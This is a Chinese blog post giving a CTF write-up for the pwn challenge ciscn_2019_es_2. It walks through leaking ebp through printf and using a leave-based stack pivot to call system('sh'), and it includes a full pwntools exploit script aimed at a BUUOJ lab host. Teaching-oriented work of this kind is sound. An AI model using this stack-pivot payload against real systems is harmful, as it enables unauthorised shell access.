【CTF】ciscn_2019_es_2

最新推荐文章于 2024-07-23 15:40:49 发布
最新推荐文章于 2024-07-23 15:40:49 发布
阅读量1.4k 收藏
点赞数 1
分类专栏: CTF 文章标签: c++ 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011317663/article/details/125983949
版权

解题思路

反编译

undefined4 main(void)
{
  EVP_PKEY_CTX *in_stack_fffffff0;
  
  init(in_stack_fffffff0);
  puts("Welcome, my friend. What\'s your name?");
  vul();
  return 0;
}

void vul(void)
{
  undefined local_2c [40];
  memset(local_2c,0,0x20);
  read(0,local_2c,0x30);
  printf("Hello, %s\n",local_2c);
  read(0,local_2c,0x30);
  printf("Hello, %s\n",local_2c);
  return;
}

void hack(void)
{
  system("echo flag");
  return;
}

从反编译结果来看,漏洞还是很清晰的,vul中的read函数提供了溢出点,hack函数提供了system函数调用。

难点&思路

首先是溢出点,从局部变量大小和读取长度限制来看,可以溢出,但是长度不长,经过测试,溢出点在第44字节处,也就是说,只能设置一个4字节返回地址。

undefined local_2c [40];
read(0,local_2c,0x30);

再就是hack函数,system的参数需要构造,但是从上面一条可以看出,普通的溢出没法构造更多的参数。
所以,难点就是如何扩展溢出长度?
从汇编和反编译代码来看,没有有效途径,但是有一个疑点:返回地址前面是ebp地址,如果溢出只能覆盖到返回地址,那么另外一个能影响的就是ebp,是否可以通过控制ebp来控制下次的执行?
经过反复调试发现,返回地址为leave会将栈址降低,跳到局部变量范围,那就可以通过read函数输入需要的参数信息。
然后,剩下最后一个问题,ebp的地址如何设置?
vul的两次read和printf很值得分析,从前面分析得知,read长度限制只比局部变量多8个字节,这8个字节就是ebp以及函数返回地址,而printf以字符串格式打印,那将局部变量全部填充为非0字节,就能打印出后面8个字节的内容。(如果8个字节中有0x00,那确实也会存在阶段的问题),还好,经过测试,该方法有效。

解题脚本

from pwn import *

context(arch = 'amd64', os = 'linux',log_level = 'debug', terminal="/bin/sh")
#sh = process('./ciscn_2019_es_2')
sh = remote('node4.buuoj.cn',28365)
vuln_addr = 0x08048625
system_plt = 0x08048400
vuln_leave_addr = 0x080485fd

sh.recvline()
pad = '0'*39
sh.sendline(pad.encode())
text = sh.recvline()
text += sh.recvline()
addr_s = text[47:51]
ebp_addr = int.from_bytes(addr_s, 'little')
print("addr:%#x" % ebp_addr)

#ebp_addr = 0xffffd2c8
#exp = 'sh'.encode() + p8(0) + p8(0) + p32(0) + p32(0) + p32(system_plt) + p32(vuln_addr) + p32(ebp_addr - 0x38) + p32(0)
exp = p32(system_plt) + p32(vuln_addr) + p32(ebp_addr - 0x38 + 12) + 'sh'.encode() + p16(0)
payload = exp + ('2'*24).encode() + p32(ebp_addr - 0x3c) +  p32(vuln_leave_addr)
sh.send(payload)
sh.recvline()

with open('payload.txt', 'wb') as f:
    f.write(('0'*47).encode() + '\n'.encode())
    f.write(payload)

sh.interactive()

总结

跟之前一样,这个思路其实也是比较快就想到了,但是卡在如何利用ebp来跳转上,费了很多时间,没想到leave还会降低栈址, 其中的ebp_addr-0x3c经过实验得出;另外就是在做本题时,在本机实验时,system不会wait,导致排查费了较多时间,谁知上靶机刚刚滴,没有任何问题,欲哭无泪。。。

delta_hell
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【pwn】ciscn_2019_es_2
Nothing
12-24 2791
例行检查 分析程序,程序存在system函数,但是不能直接得到flag。 vul函数中存在栈溢出,但只能溢出8个字节,只能盖到ebp和ret。vul函数中有两次read和printf第一次可以用来泄露ebp,得到栈地址,然后进行栈迁移。然后利用main函数返回时将控制流转到system。 根据一下汇编代码布置栈数据。 from pwn import * #io=process('ciscn...
ciscn_2019_c_1 1
qq_41560595的博客
10-06 4399
payload构造 此题和之前总结的ret2libc题型相似,但是那个题是32位的,而此题是64位的。因此,payload的构造方式不一样。 payload1 此时的esp正处于函数返回的状态,即从上往下走。 在64位中,有rdi,rsi,rdx,rcx,r8,r9几个寄存器保存参数。当esp指向pop rdi ;ret时,rip指向puts_got,puts_got所保存的真实地址就能弹到rdi上。以上是准备参数。 再往下就是是固定格式“函数地址+返回地址+参数”的体现: 利用puts_plt作为函数地
[BUUCTF]PWN——ciscn_2019_es_2
mcmuyanga的博客
10-27 2352
ciscn_2019_es_2 附件 步骤: 例行检查,32位程序,开启了nx保护 32位ida载入,shif+f12查看程序里的字符串,这边的“echo flag” 是个迷惑性的字符串,它只是输出了flag这4个字符,但是程序里有system函数,到时候这个函数可以直接拿来使用 system_addr=0x80048400 main函数 程序主体在vul函数里 读入0x30字节数据给s,s大小是0x28,只能溢出0x8字节,覆盖到ret,没法构造太长的rop,但是这边可以给s写入
栈迁移及ciscn_2019_es_2解题
最新发布
2301_81504456的博客
07-23 424
栈迁移理解及做题
ciscn_2019_es_2
z1r0的博客
12-08 205
ciscn_2019_es_2 查看保护 有溢出,但是溢出有限,所以可以考虑一下栈迁移。 栈迁移其实就是通过ebp和esp间接跳板来控制eip执行system即可。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 28028) else: r = pro
[CISCN2021]华北区_ctf_re_imnotavirus
qq_43583624的博客
06-21 1266
2021国赛CTF华北区_re_imnotavirus 题目来源和附件 Written by PoilZero(个人博客:http://poilzero.sipc115.club/) 同步转发到简书和CSDN 题目来源: 2021年第十四届全国大学生信息安全竞赛——创新实践能力赛 华北赛区 re方向第一题 imnotavirus 题目附件: https://poil.lanzoui.com/i0iImqjom6h 个人解题目录和部分所需程序: https://poil.lanzoui.com/i0
BUUCTF-PWN刷题记录-8
weixin_44145820的博客
04-16 902
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
【pwn学习】stack_pivoting
Morphy_Amo的博客
03-07 516
rop、栈劫持
CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1323
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
BUUOJ PWN 61-80
2h4ox1n9
12-17 258
61\
buuctf ciscn_2019_es_2
carol2358的博客
04-24 646
通过这道题总算学会用gdb来调试stack了 一道栈迁移的题目,printf函数可以泄露出bp的地址 有system函数,但是没有/bin/sh,所以我采用了往stack里写入binsh,然后通过泄露出来的bp算出偏移来指向binsh的位置,从而getshell 调试的时候看泄露出的栈地址和aaaa的偏移,和binsh的偏移,栈上的地址是\xff开头 exp: from pwn import ...
【BUUCTFciscn_2019_es_2
m0_51251108的博客
12-28 277
【BUUCTFciscn_2019_es_2 看下程序 有两处read可以溢出,但只能溢出刚好盖到ebp和ret 由于memset只清了0x20,所以可以泄露出ebp 有system函数,但参数不对 思路:运用栈迁移,迁移到我们写入的前面的部分,写rop链,就可以开shell了 由于需要跳转到我们写入的前面的部分需要知道它的地址,地址=ebp地址-偏移。 用gdb-peda调试,断点设在vul函数,一步步跟进,可以输入aaaa 然后searchmem aaaa stack 来查看栈状态 (这图可能
[PWN] BUUCTF ciscn_2019_es_2
空城惜梦的博客
06-20 1335
[PWN] BUUCTF ciscn_2019_es_2解题分析漏洞利用payload解析程序执行过程图参考: 解题分析 按照惯例checksec一下,开了NX与RELRO 运行程序,查看逻辑,两次input,并且回显Hello,input 32位IDA打开,查看关键函数vul(),发现两次read往s里写内容,read可写0x30个字节,但s的缓冲区只有0x28个字节,所以这里存在着栈溢出,若有backdoor直接获得flag的话,可直接构造 payload=0x28*‘a’+ebp+backdoo
[PWN] 栈迁移 ciscn_2019_es_2
LDX的博客
11-28 347
栈迁移 基础题目 理解 ciscn_2019_es_2
ctf Web_php_include
08-28
CTF(Capture The Flag)是一种网络安全竞赛,其中参与者需要解决各种与网络安全相关的问题。"Web_php_include" 是一个问题的提示,暗示了一个与 PHP 文件包含漏洞相关的 CTF 题目。 PHP 文件包含漏洞是一种常见的 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值